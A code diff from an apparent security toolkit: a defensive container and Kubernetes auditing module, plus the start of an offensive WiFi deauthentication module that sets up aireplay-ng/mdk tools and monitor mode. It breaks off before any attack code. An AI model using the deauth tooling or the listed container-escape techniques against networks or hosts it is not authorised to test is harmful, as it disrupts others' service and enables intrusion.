'No scanner available. Install trivy or grype.', + 'vulnerabilities': [], + 'summary': {}, + } + + def _parse_trivy(self, raw: str, image_name: str) -> dict: + """Parse Trivy JSON output.""" + vulns = [] + summary = {'CRITICAL': 0, 'HIGH': 0, 'MEDIUM': 0, 'LOW': 0} + try: + data = json.loads(raw) + results = data.get('Results', []) + for r in results: + for v in r.get('Vulnerabilities', []): + sev = v.get('Severity', 'UNKNOWN').upper() + entry = { + 'cve': v.get('VulnerabilityID', ''), + 'severity': sev, + 'package': v.get('PkgName', ''), + 'installed_version': v.get('InstalledVersion', ''), + 'fixed_version': v.get('FixedVersion', ''), + 'title': v.get('Title', ''), + } + vulns.append(entry) + if sev in summary: + summary[sev] += 1 + except (json.JSONDecodeError, ValueError): + return {'image': image_name, 'scanner': 'trivy', + 'error': 'Failed to parse trivy output', 'vulnerabilities': [], 'summary': {}} + + result = { + 'image': image_name, + 'scanner': 'trivy', + 'vulnerabilities': vulns, + 'summary': summary, + 'total': len(vulns), + } + self._results['image_scans'][image_name] = result + self._save_results() + return result + + def _parse_grype(self, raw: str, image_name: str) -> dict: + """Parse Grype JSON output.""" + vulns = [] + summary = {'CRITICAL': 0, 'HIGH': 0, 'MEDIUM': 0, 'LOW': 0} + try: + data = json.loads(raw) + for m in data.get('matches', []): + v = m.get('vulnerability', {}) + sev = v.get('severity', 'Unknown').upper() + pkg = m.get('artifact', {}) + fixed = '' + fix_vers = v.get('fix', {}).get('versions', []) + if fix_vers: + fixed = fix_vers[0] + entry = { + 'cve': v.get('id', ''), + 'severity': sev, + 'package': pkg.get('name', ''), + 'installed_version': pkg.get('version', ''), + 'fixed_version': fixed, + 'title': v.get('description', '')[:120], + } + vulns.append(entry) + if sev in summary: + summary[sev] += 1 + except (json.JSONDecodeError, ValueError): + return {'image': image_name, 'scanner': 'grype', + 'error': 'Failed to parse grype output', 'vulnerabilities': [], 'summary': {}} + + result = { + 'image': image_name, + 'scanner': 'grype', + 'vulnerabilities': vulns, + 'summary': summary, + 'total': len(vulns), + } + self._results['image_scans'][image_name] = result + self._save_results() + return result + + # ── Dockerfile Linting ─────────────────────────────────────────────────── + + def lint_dockerfile(self, content: str) -> list: + """Lint a Dockerfile for security issues.""" + findings = [] + lines = content.splitlines() + has_user = False + has_healthcheck = False + consecutive_run = 0 + max_consecutive_run = 0 + + for i, raw_line in enumerate(lines, 1): + line = raw_line.strip() + if not line or line.startswith('#'): + consecutive_run = 0 + continue + + upper = line.upper() + + # FROM :latest + if upper.startswith('FROM '): + img = line[5:].strip().split(' ')[0] + if ':' not in img or img.endswith(':latest'): + findings.append({ + 'rule': 'DL001', 'line': i, + 'severity': DOCKERFILE_RULES['DL001']['severity'], + 'title': DOCKERFILE_RULES['DL001']['title'], + 'detail': f'Image "{img}" — pin a specific version tag.', + }) + + # USER directive + if upper.startswith('USER '): + has_user = True + + # HEALTHCHECK + if upper.startswith('HEALTHCHECK '): + has_healthcheck = True + + # ADD vs COPY + if upper.startswith('ADD ') and not line.strip().startswith('ADD --from'): + parts = line[4:].strip() + # Skip if it's a URL (ADD has valid URL use) + if not parts.startswith('http://') and not parts.startswith('https://'): + findings.append({ + 'rule': 'DL003', 'line': i, + 'severity': DOCKERFILE_RULES['DL003']['severity'], + 'title': DOCKERFILE_RULES['DL003']['title'], + 'detail': f'Line {i}: prefer COPY over ADD for local files.', + }) + + # Secrets in ENV/ARG + if upper.startswith('ENV ') or upper.startswith('ARG '): + key = line.split()[1] if len(line.split()) > 1 else '' + key = key.split('=')[0] + if SECRET_PATTERNS.search(key): + findings.append({ + 'rule': 'DL004', 'line': i, + 'severity': DOCKERFILE_RULES['DL004']['severity'], + 'title': DOCKERFILE_RULES['DL004']['title'], + 'detail': f'Line {i}: "{key}" looks like a secret. Use --secret instead.', + }) + + # apt-get without --no-install-recommends + if 'apt-get install' in line and '--no-install-recommends' not in line: + findings.append({ + 'rule': 'DL006', 'line': i, + 'severity': DOCKERFILE_RULES['DL006']['severity'], + 'title': DOCKERFILE_RULES['DL006']['title'], + 'detail': f'Line {i}: add --no-install-recommends to reduce image size.', + }) + + # COPY/ADD of sensitive files + if upper.startswith('COPY ') or upper.startswith('ADD '): + if SENSITIVE_FILE_PATTERNS.search(line): + findings.append({ + 'rule': 'DL009', 'line': i, + 'severity': DOCKERFILE_RULES['DL009']['severity'], + 'title': DOCKERFILE_RULES['DL009']['title'], + 'detail': f'Line {i}: copying potentially sensitive file into image.', + }) + + # sudo in RUN + if upper.startswith('RUN ') and 'sudo ' in line: + findings.append({ + 'rule': 'DL010', 'line': i, + 'severity': DOCKERFILE_RULES['DL010']['severity'], + 'title': DOCKERFILE_RULES['DL010']['title'], + 'detail': f'Line {i}: avoid sudo in Dockerfiles.', + }) + + # Consecutive RUN + if upper.startswith('RUN '): + consecutive_run += 1 + if consecutive_run > max_consecutive_run: + max_consecutive_run = consecutive_run + else: + consecutive_run = 0 + + # Post-scan checks + if not has_user: + findings.append({ + 'rule': 'DL002', 'line': 0, + 'severity': DOCKERFILE_RULES['DL002']['severity'], + 'title': DOCKERFILE_RULES['DL002']['title'], + 'detail': 'No USER directive found. Container will run as root.', + }) + + if not has_healthcheck: + findings.append({ + 'rule': 'DL005', 'line': 0, + 'severity': DOCKERFILE_RULES['DL005']['severity'], + 'title': DOCKERFILE_RULES['DL005']['title'], + 'detail': 'No HEALTHCHECK instruction. Add one for orchestration.', + }) + + if max_consecutive_run >= 3: + findings.append({ + 'rule': 'DL011', 'line': 0, + 'severity': DOCKERFILE_RULES['DL011']['severity'], + 'title': DOCKERFILE_RULES['DL011']['title'], + 'detail': f'{max_consecutive_run} consecutive RUN commands. Chain with && to reduce layers.', + }) + + # Check for missing cache cleanup + if 'apt-get install' in content and 'rm -rf /var/lib/apt/lists' not in content: + findings.append({ + 'rule': 'DL007', 'line': 0, + 'severity': DOCKERFILE_RULES['DL007']['severity'], + 'title': DOCKERFILE_RULES['DL007']['title'], + 'detail': 'apt-get install used without cleaning /var/lib/apt/lists/*.', + }) + + self._results['dockerfile_lints'] = findings + self._save_results() + return findings + + # ── Container Escape Detection ─────────────────────────────────────────── + + def check_escape_vectors(self, container_id: str) -> dict: + """Check for container escape possibilities.""" + info = self.inspect_container(container_id) + if 'error' in info: + return info + + vectors = [] + + def vec(name, risk, exploitable, detail): + vectors.append({ + 'vector': name, + 'risk': risk, + 'exploitable': exploitable, + 'detail': detail, + }) + + # 1. Privileged mode — full escape + if info['privileged']: + vec('Privileged Mode', 'critical', True, + 'Container has full access to host devices and kernel. ' + 'Trivial escape via mounting host filesystem.') + + # 2. Docker socket mount + sock_mounted = any( + '/var/run/docker.sock' in m.get('source', '') or + '/run/docker.sock' in m.get('source', '') + for m in info['mounts'] + ) + if sock_mounted: + vec('Docker Socket Mount', 'critical', True, + 'Docker socket mounted inside container. Attacker can spawn ' + 'privileged containers on the host.') + + # 3. SYS_ADMIN capability + if 'SYS_ADMIN' in info.get('cap_add', []): + vec('SYS_ADMIN Capability', 'high', True, + 'SYS_ADMIN allows mounting filesystems, modifying cgroups. ' + 'Combined with other misconfigs, can lead to escape.') + + # 4. SYS_PTRACE capability + if 'SYS_PTRACE' in info.get('cap_add', []): + vec('SYS_PTRACE Capability', 'high', True, + 'SYS_PTRACE allows process injection and debugging. ' + 'Can be used to escape via process injection into host PID.') + + # 5. Host PID namespace + if info.get('pid_mode') == 'host': + vec('Host PID Namespace', 'high', True, + 'Container shares PID namespace with host. Processes visible ' + 'and injectable from container.') + + # 6. Host network namespace + if info.get('network_mode') == 'host': + vec('Host Network Namespace', 'medium', False, + 'Container shares host network stack. Can sniff host traffic ' + 'and access services on localhost.') + + # 7. /proc write access + proc_mounted = any( + m.get('destination', '').startswith('/proc') and m.get('rw', True) + for m in info['mounts'] + ) + if proc_mounted: + vec('/proc Write Access', 'high', True, + 'Writable /proc mount can enable kernel parameter modification ' + 'and cgroup escape techniques.') + + # 8. Kernel version (check for known container escape CVEs) + ok, uname = self._run('uname -r 2>/dev/null') + if ok and uname: + kernel = uname.strip() + # Known vulnerable kernel ranges (simplified check) + vec('Kernel Version', 'info', False, + f'Host kernel: {kernel}. Check against CVE-2022-0185, ' + f'CVE-2022-0847 (DirtyPipe), CVE-2021-22555.') + + # 9. Cgroup escape + if info['privileged'] or 'SYS_ADMIN' in info.get('cap_add', []): + vec('Cgroup Escape', 'critical' if info['privileged'] else 'high', True, + 'Privileged + cgroup v1 release_agent technique enables full ' + 'host command execution.') + + # 10. Seccomp disabled + if any('seccomp=unconfined' in opt for opt in info.get('security_opt', [])): + vec('Seccomp Disabled', 'medium', False, + 'No seccomp filter. All syscalls available including ' + 'those needed for escape techniques.') + + # 11. AppArmor disabled + if any('apparmor=unconfined' in opt for opt in info.get('security_opt', [])): + vec('AppArmor Disabled', 'medium', False, + 'No AppArmor confinement. Reduced protection against ' + 'filesystem and network abuse.') + + risk_score = 0 + for v in vectors: + w = {'critical': 40, 'high': 25, 'medium': 10, 'low': 5, 'info': 0} + risk_score += w.get(v['risk'], 0) + risk_score = min(risk_score, 100) + + result = { + 'container_id': container_id, + 'name': info.get('name', ''), + 'vectors': vectors, + 'risk_score': risk_score, + 'total_vectors': len(vectors), + 'exploitable': sum(1 for v in vectors if v['exploitable']), + } + + self._results['escape_checks'][container_id] = result + self._save_results() + return result + + # ── Kubernetes Operations ──────────────────────────────────────────────── + + def _kubectl(self, args: str, timeout: int = 30) -> tuple: + kubectl = find_tool('kubectl') + if not kubectl: + return False, 'kubectl not found' + return self._run(f'"{kubectl}" {args}', timeout=timeout) + + def _kubectl_json(self, args: str, timeout: int = 30) -> tuple: + kubectl = find_tool('kubectl') + if not kubectl: + return False, 'kubectl not found' + return self._run_json(f'"{kubectl}" {args} -o json', timeout=timeout) + + def k8s_get_namespaces(self) -> list: + """List Kubernetes namespaces.""" + ok, data = self._kubectl_json('get namespaces') + if not ok: + return [] + namespaces = [] + for item in data.get('items', []): + meta = item.get('metadata', {}) + namespaces.append({ + 'name': meta.get('name', ''), + 'status': item.get('status', {}).get('phase', ''), + 'age': meta.get('creationTimestamp', ''), + }) + return namespaces + + def k8s_get_pods(self, namespace: str = 'default') -> list: + """List pods in a namespace.""" + ok, data = self._kubectl_json(f'get pods -n {namespace}') + if not ok: + return [] + pods = [] + for item in data.get('items', []): + meta = item.get('metadata', {}) + spec = item.get('spec', {}) + status = item.get('status', {}) + containers = [c.get('name', '') for c in spec.get('containers', [])] + pod_status = status.get('phase', 'Unknown') + conditions = status.get('conditions', []) + ready = any(c.get('type') == 'Ready' and c.get('status') == 'True' + for c in conditions) + pods.append({ + 'name': meta.get('name', ''), + 'namespace': meta.get('namespace', namespace), + 'status': pod_status, + 'ready': ready, + 'containers': containers, + 'node': spec.get('nodeName', ''), + 'age': meta.get('creationTimestamp', ''), + 'restart_count': sum( + cs.get('restartCount', 0) + for cs in status.get('containerStatuses', []) + ), + }) + return pods + + def k8s_audit_rbac(self, namespace: Optional[str] = None) -> dict: + """Audit RBAC for overly permissive bindings.""" + findings = [] + + # Cluster role bindings + ok, data = self._kubectl_json('get clusterrolebindings') + if ok: + for item in data.get('items', []): + meta = item.get('metadata', {}) + role_ref = item.get('roleRef', {}) + subjects = item.get('subjects', []) + + if role_ref.get('name') == 'cluster-admin': + for subj in subjects: + findings.append({ + 'severity': 'critical', + 'type': 'cluster-admin binding', + 'binding': meta.get('name', ''), + 'subject': f'{subj.get("kind", "")}/{subj.get("name", "")}', + 'detail': 'cluster-admin grants full cluster access', + }) + + # Check for wildcard permissions in cluster roles + ok, data = self._kubectl_json('get clusterroles') + if ok: + for item in data.get('items', []): + meta = item.get('metadata', {}) + role_name = meta.get('name', '') + for rule in item.get('rules', []): + verbs = rule.get('verbs', []) + resources = rule.get('resources', []) + api_groups = rule.get('apiGroups', []) + if '*' in verbs and '*' in resources: + findings.append({ + 'severity': 'high', + 'type': 'wildcard permissions', + 'binding': role_name, + 'subject': '', + 'detail': f'Role "{role_name}" has wildcard verbs and resources ' + f'on apiGroups: {api_groups}', + }) + + # Check service account token automount + ns_flag = f'-n {namespace}' if namespace else '--all-namespaces' + ok, data = self._kubectl_json(f'get serviceaccounts {ns_flag}') + if ok: + for item in data.get('items', []): + meta = item.get('metadata', {}) + automount = item.get('automountServiceAccountToken', True) + if automount and meta.get('name') != 'default': + findings.append({ + 'severity': 'low', + 'type': 'token automount', + 'binding': meta.get('name', ''), + 'subject': f'namespace/{meta.get("namespace", "")}', + 'detail': f'SA "{meta.get("name")}" has automountServiceAccountToken enabled', + }) + + result = {'findings': findings, 'total': len(findings)} + self._results['k8s_audits']['rbac'] = result + self._save_results() + return result + + def k8s_check_secrets(self, namespace: str = 'default') -> dict: + """Check for exposed or unencrypted secrets.""" + findings = [] + + ok, data = self._kubectl_json(f'get secrets -n {namespace}') + if not ok: + return {'error': 'Cannot list secrets', 'findings': []} + + for item in data.get('items', []): + meta = item.get('metadata', {}) + secret_type = item.get('type', '') + secret_name = meta.get('name', '') + data_keys = list((item.get('data') or {}).keys()) + + # Check for default token (legacy, pre-1.24) + if secret_type == 'kubernetes.io/service-account-token': + findings.append({ + 'severity': 'info', + 'name': secret_name, + 'type': secret_type, + 'detail': f'SA token secret with keys: {", ".join(data_keys)}', + }) + + # Check for Opaque secrets with suspicious names + if secret_type == 'Opaque': + for key in data_keys: + if SECRET_PATTERNS.search(key): + findings.append({ + 'severity': 'medium', + 'name': secret_name, + 'type': secret_type, + 'detail': f'Key "{key}" may contain credentials', + }) + + # Check which pods mount secrets + ok, pod_data = self._kubectl_json(f'get pods -n {namespace}') + if ok: + for pod in pod_data.get('items', []): + pod_name = pod.get('metadata', {}).get('name', '') + volumes = pod.get('spec', {}).get('volumes', []) + for vol in volumes: + if vol.get('secret'): + findings.append({ + 'severity': 'info', + 'name': vol['secret'].get('secretName', ''), + 'type': 'mounted', + 'detail': f'Secret mounted in pod "{pod_name}"', + }) + + result = {'findings': findings, 'total': len(findings), 'namespace': namespace} + self._results['k8s_audits']['secrets'] = result + self._save_results() + return result + + def k8s_check_network_policies(self, namespace: str = 'default') -> dict: + """Check if network policies exist and find unprotected pods.""" + findings = [] + + ok, data = self._kubectl_json(f'get networkpolicies -n {namespace}') + policies = data.get('items', []) if ok else [] + + if not policies: + findings.append({ + 'severity': 'high', + 'type': 'no_policies', + 'detail': f'No NetworkPolicies found in namespace "{namespace}". ' + f'All pod-to-pod traffic is allowed.', + }) + return {'findings': findings, 'total': 1, 'namespace': namespace, + 'policy_count': 0, 'unprotected_pods': []} + + # Collect pod selectors covered by policies + covered_labels = set() + for pol in policies: + spec = pol.get('spec', {}) + selector = spec.get('podSelector', {}) + match_labels = selector.get('matchLabels', {}) + if not match_labels: + covered_labels.add('__all__') + else: + for k, v in match_labels.items(): + covered_labels.add(f'{k}={v}') + + # Check pods without matching policies + unprotected = [] + if '__all__' not in covered_labels: + ok, pod_data = self._kubectl_json(f'get pods -n {namespace}') + if ok: + for pod in pod_data.get('items', []): + meta = pod.get('metadata', {}) + labels = meta.get('labels', {}) + pod_labels = {f'{k}={v}' for k, v in labels.items()} + if not pod_labels.intersection(covered_labels): + unprotected.append(meta.get('name', '')) + + if unprotected: + findings.append({ + 'severity': 'medium', + 'type': 'unprotected_pods', + 'detail': f'{len(unprotected)} pod(s) not covered by any NetworkPolicy', + }) + + result = { + 'findings': findings, + 'total': len(findings), + 'namespace': namespace, + 'policy_count': len(policies), + 'unprotected_pods': unprotected, + } + self._results['k8s_audits']['network_policies'] = result + self._save_results() + return result + + def k8s_audit_pod(self, pod_name: str, namespace: str = 'default') -> dict: + """Security audit of a Kubernetes pod.""" + ok, data = self._kubectl_json(f'get pod {pod_name} -n {namespace}') + if not ok: + return {'error': f'Cannot get pod {pod_name}'} + + spec = data.get('spec', {}) + findings = [] + passed = 0 + total = 0 + + def check(name, ok, detail='', severity='medium'): + nonlocal passed, total + total += 1 + if ok: + passed += 1 + findings.append({ + 'check': name, + 'status': 'pass' if ok else 'fail', + 'severity': severity if not ok else 'info', + 'detail': detail, + }) + + # Host namespaces + check('Host Network', + not spec.get('hostNetwork', False), + 'Pod uses host network namespace!' if spec.get('hostNetwork') else 'Isolated', + severity='high') + check('Host PID', + not spec.get('hostPID', False), + 'Pod uses host PID namespace!' if spec.get('hostPID') else 'Isolated', + severity='high') + check('Host IPC', + not spec.get('hostIPC', False), + 'Pod uses host IPC namespace!' if spec.get('hostIPC') else 'Isolated', + severity='high') + + # Per-container checks + for container in spec.get('containers', []): + c_name = container.get('name', 'unknown') + sec_ctx = container.get('securityContext', {}) + + # Privileged + priv = sec_ctx.get('privileged', False) + check(f'{c_name}: Privileged', + not priv, + 'Container is privileged!' if priv else 'Not privileged', + severity='critical') + + # Run as root + run_as_user = sec_ctx.get('runAsUser') + run_as_non_root = sec_ctx.get('runAsNonRoot', False) + is_root = run_as_user == 0 or (run_as_user is None and not run_as_non_root) + check(f'{c_name}: Root User', + not is_root, + f'Runs as UID {run_as_user}' if run_as_user and run_as_user != 0 + else ('runAsNonRoot=true' if run_as_non_root else 'May run as root'), + severity='medium') + + # Read-only root filesystem + ro = sec_ctx.get('readOnlyRootFilesystem', False) + check(f'{c_name}: Read-only Rootfs', + ro, + 'Root filesystem is read-only' if ro else 'Writable root filesystem', + severity='low') + + # Resource limits + resources = container.get('resources', {}) + limits = resources.get('limits', {}) + has_limits = bool(limits.get('memory') or limits.get('cpu')) + check(f'{c_name}: Resource Limits', + has_limits, + f'Limits: {limits}' if has_limits else 'No resource limits set', + severity='medium') + + # Capabilities + caps = sec_ctx.get('capabilities', {}) + cap_add = caps.get('add', []) + dangerous = [c for c in cap_add if c in DANGEROUS_CAPS] + all_dropped = 'ALL' in caps.get('drop', []) + check(f'{c_name}: Capabilities', + len(dangerous) == 0 and (all_dropped or not cap_add), + f'Dangerous caps: {", ".join(dangerous)}' if dangerous + else ('All capabilities dropped' if all_dropped else 'Default capabilities'), + severity='high' if dangerous else 'info') + + # Privilege escalation + allow_escalation = sec_ctx.get('allowPrivilegeEscalation', True) + check(f'{c_name}: Privilege Escalation', + not allow_escalation, + 'allowPrivilegeEscalation=true' if allow_escalation + else 'Privilege escalation disabled', + severity='medium') + + # Service account + sa = spec.get('serviceAccountName', 'default') + automount = spec.get('automountServiceAccountToken', True) + check('Service Account', + sa != 'default' or not automount, + f'SA: {sa}, automount: {automount}', + severity='low') + + score = int((passed / total) * 100) if total > 0 else 0 + result = { + 'pod': pod_name, + 'namespace': namespace, + 'score': score, + 'passed': passed, + 'total': total, + 'findings': findings, + } + self._results['k8s_audits'][f'pod:{namespace}/{pod_name}'] = result + self._save_results() + return result + + # ── Export ──────────────────────────────────────────────────────────────── + + def export_results(self, fmt: str = 'json') -> dict: + """Export all audit results.""" + self._results['timestamp'] = datetime.utcnow().isoformat() + if fmt == 'json': + path = self._data_dir / f'container_sec_export_{int(time.time())}.json' + with open(path, 'w') as f: + json.dump(self._results, f, indent=2, default=str) + return {'path': str(path), 'format': 'json', 'success': True} + return {'error': f'Unsupported format: {fmt}'} + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + + +def get_container_sec() -> ContainerSecurity: + global _instance + if _instance is None: + _instance = ContainerSecurity() + return _instance + + +# ── CLI Entry Point ────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for Container Security module.""" + cs = get_container_sec() + + while True: + print(f"\n{'='*60}") + print(f" Container Security") + print(f"{'='*60}") + print() + print(" 1 — Audit Docker Host") + print(" 2 — List Containers") + print(" 3 — Audit Container") + print(" 4 — Scan Image") + print(" 5 — Lint Dockerfile") + print(" 6 — K8s Pods") + print(" 7 — K8s RBAC Audit") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + + elif choice == '1': + print("\n [*] Auditing Docker host...") + findings = cs.audit_docker_host() + if not findings: + print(" [-] No findings.") + for f in findings: + sev = f.get('severity', 'info').upper() + status = f.get('status', 'info').upper() + color = {'CRITICAL': Colors.RED, 'HIGH': Colors.RED, + 'MEDIUM': Colors.YELLOW, 'LOW': Colors.CYAN, + 'INFO': Colors.GREEN}.get(sev, Colors.WHITE) + print(f" {color}[{sev}]{Colors.RESET} {f['check']}: {f['detail']}") + + elif choice == '2': + containers = cs.list_containers(all=True) + if not containers: + print(" [-] No containers found.") + else: + print(f"\n {'ID':<14} {'Name':<25} {'Image':<30} {'Status':<15}") + print(f" {'-'*14} {'-'*25} {'-'*30} {'-'*15}") + for c in containers: + print(f" {c['id']:<14} {c['name']:<25} {c['image']:<30} {c['status']:<15}") + + elif choice == '3': + cid = input(" Container ID or name: ").strip() + if cid: + print(f"\n [*] Auditing container {cid}...") + result = cs.audit_container(cid) + if 'error' in result: + print(f" [!] {result['error']}") + else: + print(f"\n Security Score: {result['score']}% ({result['passed']}/{result['total']})") + for f in result['findings']: + sym = '+' if f['status'] == 'pass' else '!' + color = Colors.GREEN if f['status'] == 'pass' else Colors.YELLOW + print(f" {color}[{sym}]{Colors.RESET} {f['check']}: {f['detail']}") + + elif choice == '4': + img = input(" Image name (e.g., nginx:latest): ").strip() + if img: + print(f"\n [*] Scanning {img} for vulnerabilities...") + result = cs.scan_image(img) + if result.get('error'): + print(f" [!] {result['error']}") + else: + s = result.get('summary', {}) + print(f" Scanner: {result.get('scanner', '?')}") + print(f" Total: {result.get('total', 0)} vulnerabilities") + print(f" Critical: {s.get('CRITICAL', 0)} High: {s.get('HIGH', 0)} " + f"Medium: {s.get('MEDIUM', 0)} Low: {s.get('LOW', 0)}") + for v in result.get('vulnerabilities', [])[:20]: + print(f" {v['severity']:<8} {v['cve']:<18} {v['package']:<20} " + f"{v['installed_version']} -> {v.get('fixed_version', 'n/a')}") + + elif choice == '5': + path = input(" Path to Dockerfile: ").strip() + if path and os.path.isfile(path): + with open(path) as f: + content = f.read() + findings = cs.lint_dockerfile(content) + if not findings: + print(" [+] No issues found.") + else: + print(f"\n Found {len(findings)} issue(s):") + for f in findings: + sev = f.get('severity', 'info').upper() + line = f"line {f['line']}" if f.get('line') else 'general' + print(f" [{sev}] {f['rule']}: {f['title']} ({line})") + print(f" {f['detail']}") + else: + print(" [!] File not found.") + + elif choice == '6': + ns = input(" Namespace (default): ").strip() or 'default' + pods = cs.k8s_get_pods(namespace=ns) + if not pods: + print(" [-] No pods found.") + else: + print(f"\n {'Name':<35} {'Status':<12} {'Node':<20} {'Restarts':<10}") + print(f" {'-'*35} {'-'*12} {'-'*20} {'-'*10}") + for p in pods: + print(f" {p['name']:<35} {p['status']:<12} {p['node']:<20} {p['restart_count']:<10}") + + elif choice == '7': + ns = input(" Namespace (blank for all): ").strip() or None + print("\n [*] Auditing RBAC...") + result = cs.k8s_audit_rbac(namespace=ns) + if not result.get('findings'): + print(" [+] No RBAC issues found.") + else: + print(f" Found {result['total']} issue(s):") + for f in result['findings']: + sev = f.get('severity', 'info').upper() + print(f" [{sev}] {f['type']}: {f.get('binding', '')} — {f['detail']}") diff --git a/modules/deauth.py b/modules/deauth.py new file mode 100644 index 0000000..4c09b87 --- /dev/null +++ b/modules/deauth.py @@ -0,0 +1,1287 @@ +"""AUTARCH Deauth Attack Module + +Targeted and broadcast WiFi deauthentication, multi-target attacks, +continuous mode, channel hopping, and client discovery for wireless +assessments. Designed for Raspberry Pi and SBCs with monitor-mode adapters. +""" + +DESCRIPTION = "WiFi deauthentication — targeted & broadcast attacks" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import sys +import json +import time +import shutil +import signal +import struct +import threading +import subprocess +from pathlib import Path +from datetime import datetime +from typing import Dict, List, Optional, Any + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +sys.path.insert(0, str(Path(__file__).parent.parent)) +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = YELLOW = GREEN = CYAN = WHITE = DIM = RESET = BOLD = MAGENTA = "" + def clear_screen(): pass + def display_banner(): pass + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_deauth(): + """Return singleton DeauthAttack instance.""" + global _instance + if _instance is None: + _instance = DeauthAttack() + return _instance + + +# ── Helpers ────────────────────────────────────────────────────────────────── + +MAC_RE = re.compile(r'^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$') +BROADCAST = 'FF:FF:FF:FF:FF:FF' + + +def _validate_mac(mac: str) -> bool: + return bool(MAC_RE.match(mac)) + + +def _run(cmd, timeout=30) -> tuple: + """Run a command, return (success, stdout).""" + try: + result = subprocess.run( + cmd, shell=isinstance(cmd, str), + capture_output=True, text=True, timeout=timeout + ) + return result.returncode == 0, result.stdout.strip() + except subprocess.TimeoutExpired: + return False, 'Command timed out' + except Exception as e: + return False, str(e) + + +def _run_bg(cmd) -> Optional[subprocess.Popen]: + """Start a background process, return Popen or None.""" + try: + proc = subprocess.Popen( + cmd, shell=isinstance(cmd, str), + stdout=subprocess.PIPE, stderr=subprocess.PIPE, + text=True + ) + return proc + except Exception: + return None + + +# ── DeauthAttack Class ─────────────────────────────────────────────────────── + +class DeauthAttack: + """WiFi deauthentication attack toolkit.""" + + def __init__(self): + # Data directory + data_root = get_data_dir() + if isinstance(data_root, Path): + data_root = str(data_root) + self.data_dir = os.path.join(data_root, 'deauth') + os.makedirs(self.data_dir, exist_ok=True) + + self.history_path = os.path.join(self.data_dir, 'history.json') + + # Tool paths + self.aireplay = find_tool('aireplay-ng') or shutil.which('aireplay-ng') + self.airmon = find_tool('airmon-ng') or shutil.which('airmon-ng') + self.airodump = find_tool('airodump-ng') or shutil.which('airodump-ng') + self.mdk3 = find_tool('mdk3') or shutil.which('mdk3') + self.mdk4 = find_tool('mdk4') or shutil.which('mdk4') + self.iw = shutil.which('iw') + self.ip_cmd = shutil.which('ip') + self.iwconfig = shutil.which('iwconfig') + + # Scapy availability + self._scapy = None + try: + from scapy.all import ( + Dot11, Dot11Deauth, RadioTap, sendp, sniff, conf + ) + self._scapy = True + except ImportError: + self._scapy = False + + # Attack state + self._continuous_thread: Optional[threading.Thread] = None + self._continuous_running = False + self._continuous_target = {} + self._continuous_frames_sent = 0 + self._continuous_start_time = 0.0 + + # Channel hopping state + self._hop_thread: Optional[threading.Thread] = None + self._hop_running = False + self._current_channel = 0 + + # Attack history + self._history: List[Dict] = [] + self._load_history() + + # ── Tool Status ────────────────────────────────────────────────────── + + def get_tools_status(self) -> Dict[str, Any]: + """Return availability of all tools used by this module.""" + return { + 'aireplay-ng': self.aireplay is not None, + 'airmon-ng': self.airmon is not None, + 'airodump-ng': self.airodump is not None, + 'mdk3': self.mdk3 is not None, + 'mdk4': self.mdk4 is not None, + 'iw': self.iw is not None, + 'ip': self.ip_cmd is not None, + 'iwconfig': self.iwconfig is not None, + 'scapy': self._scapy is True, + } + + # ── Interface Management ───────────────────────────────────────────── + + def get_interfaces(self) -> List[Dict]: + """List wireless interfaces with mode info.""" + interfaces = [] + + # Try iw dev first + if self.iw: + try: + out = subprocess.check_output( + [self.iw, 'dev'], text=True, timeout=5 + ) + iface = None + for line in out.splitlines(): + line = line.strip() + if line.startswith('Interface'): + if iface: + interfaces.append(iface) + iface = { + 'name': line.split()[-1], + 'mode': 'managed', + 'channel': 0, + 'mac': '', + 'phy': '' + } + elif iface: + if line.startswith('type'): + iface['mode'] = line.split()[-1] + elif line.startswith('channel'): + try: + iface['channel'] = int(line.split()[1]) + except (ValueError, IndexError): + pass + elif line.startswith('addr'): + iface['mac'] = line.split()[-1] + if iface: + interfaces.append(iface) + except Exception: + pass + + # Fallback to iwconfig + if not interfaces and self.iwconfig: + try: + out = subprocess.check_output( + [self.iwconfig], text=True, + stderr=subprocess.DEVNULL, timeout=5 + ) + for block in out.split('\n\n'): + if 'IEEE 802.11' in block or 'ESSID' in block: + name = block.split()[0] + mode = 'managed' + if 'Mode:Monitor' in block: + mode = 'monitor' + elif 'Mode:Master' in block: + mode = 'master' + ch_m = re.search(r'Channel[:\s]*(\d+)', block) + ch = int(ch_m.group(1)) if ch_m else 0 + mac_m = re.search( + r'HWaddr\s+([\da-fA-F:]{17})', block + ) + mac = mac_m.group(1) if mac_m else '' + interfaces.append({ + 'name': name, 'mode': mode, + 'channel': ch, 'mac': mac, 'phy': '' + }) + except Exception: + pass + + # Last resort: /sys/class/net + if not interfaces: + try: + sys_net = Path('/sys/class/net') + if sys_net.exists(): + for d in sys_net.iterdir(): + if (d / 'wireless').exists() or (d / 'phy80211').exists(): + interfaces.append({ + 'name': d.name, 'mode': 'unknown', + 'channel': 0, 'mac': '', 'phy': '' + }) + except Exception: + pass + + return interfaces + + def enable_monitor(self, interface: str) -> Dict: + """Put interface into monitor mode. + + Tries airmon-ng first, falls back to iw. + Returns dict with ok, interface (monitor name), and message. + """ + if not interface: + return {'ok': False, 'error': 'No interface specified'} + + # Try airmon-ng + if self.airmon: + try: + # Kill interfering processes + subprocess.run( + [self.airmon, 'check', 'kill'], + capture_output=True, text=True, timeout=10 + ) + result = subprocess.run( + [self.airmon, 'start', interface], + capture_output=True, text=True, timeout=15 + ) + output = result.stdout + result.stderr + # Detect the monitor interface name + mon_match = re.search( + r'\(monitor mode (?:vif )?enabled(?: on| for) \[?(\w+)\]?\)', + output + ) + if mon_match: + mon_iface = mon_match.group(1) + elif os.path.isdir(f'/sys/class/net/{interface}mon'): + mon_iface = f'{interface}mon' + else: + mon_iface = interface + + return { + 'ok': True, + 'interface': mon_iface, + 'message': f'Monitor mode enabled on {mon_iface}' + } + except Exception as e: + return {'ok': False, 'error': f'airmon-ng failed: {e}'} + + # Fallback: iw + if self.iw and self.ip_cmd: + try: + subprocess.run( + [self.ip_cmd, 'link', 